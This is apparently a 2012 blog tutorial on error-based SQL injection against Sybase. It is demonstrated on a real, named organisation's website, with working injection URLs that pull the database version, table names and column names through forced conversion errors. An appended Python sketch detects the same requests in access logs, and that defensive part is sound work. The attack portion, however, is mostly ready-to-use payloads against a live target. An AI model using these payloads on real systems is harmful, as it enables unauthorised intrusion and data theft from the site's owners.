Sunday, September 16, 2012

Error-based Sybase Structured Query Language Injection


Tutorial provided by


So here we start with a site. I'm assuming you understand MySQL injection.


Put a ' at the end and you will see this:

Sybase: Server message: Unclosed quote before the character string ' '

Version Extraction

Now to get the version:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29--

So here it is:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006

Table Extraction

Now let's get some table names:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))--

Second table:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))--

Basically, keep adding and name!='table name that you get'.

Here I guess I reach the end of the tables:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' and name!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import' and name!='publications' and name!='publications_new' and name!='radio' and name!='satellites' and name!='titles'))

Time to get columns. We will get the columns of boardMembers.

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id from sysobjects where type='U' and name='gallery')))--

Column no.1:  city

Getting column 2:

Code:http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))-- 

You get my point: just add and name!='column name that you get'.
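
Seen from the server side, the requests above leave a recognizable trace in the web access log. The following Python sketch is an added example, not part of the original tutorial: it flags the convert(integer, ...) pattern after URL-decoding and collects the name!='...' exclusions, which show which names had already been returned in error pages. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers of the technique above: a forced integer conversion wrapped around
# @@version or a subquery on the Sybase system catalogs.
CONVERT = re.compile(r"convert\s*\(\s*(?:integer|int)\s*,", re.I)
TARGET = re.compile(r"@@version|\bsys(?:objects|columns)\b", re.I)
EXCLUDED = re.compile(r"name\s*!=\s*'([^']*)'", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation-range IPs).
SAMPLE_LOG = """
203.0.113.7 - - [16/Sep/2012:10:00:01 +0000] "GET /index.php?action=media.newsdetail&rowid=630 HTTP/1.1" 200 5120
203.0.113.7 - - [16/Sep/2012:10:00:09 +0000] "GET /index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29-- HTTP/1.1" 200 812
203.0.113.7 - - [16/Sep/2012:10:00:31 +0000] "GET /index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects+where+type='U'+and+name!='boardMembers'+and+name!='events'))-- HTTP/1.1" 200 840
203.0.113.7 - - [16/Sep/2012:10:01:02 +0000] "GET /index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+syscolumns+where+id=(select+id+from+sysobjects+where+type='U'+and+name='gallery')+and+name!='city'))-- HTTP/1.1" 200 829
198.51.100.4 - - [16/Sep/2012:10:02:00 +0000] "GET /search.php?q=how+to+convert+integer+in+sysobjects HTTP/1.1" 200 900
""".strip().splitlines()


def analyze(lines):
    """Return one finding per request parameter that matches the pattern."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl decodes %28-style escapes and turns '+' into a space.
        for param, value in parse_qsl(urlsplit(target).query):
            hit = TARGET.search(value)
            if hit and CONVERT.search(value):
                findings.append({
                    "client": client,
                    "param": param,
                    "target": hit.group(0).lower(),
                    # Excluded names were already returned in error pages.
                    "disclosed": EXCLUDED.findall(value),
                })
    return findings


def disclosed_by_client(findings):
    """Union of excluded names per client: a lower bound on what leaked."""
    out = {}
    for f in findings:
        out.setdefault(f["client"], set()).update(f["disclosed"])
    return out


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The flagged parameter name (rowid here) points at the query that needs parameter binding or an integer cast, and the exclusion lists bound what an incident responder should treat as exposed.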


Thanks for reading!
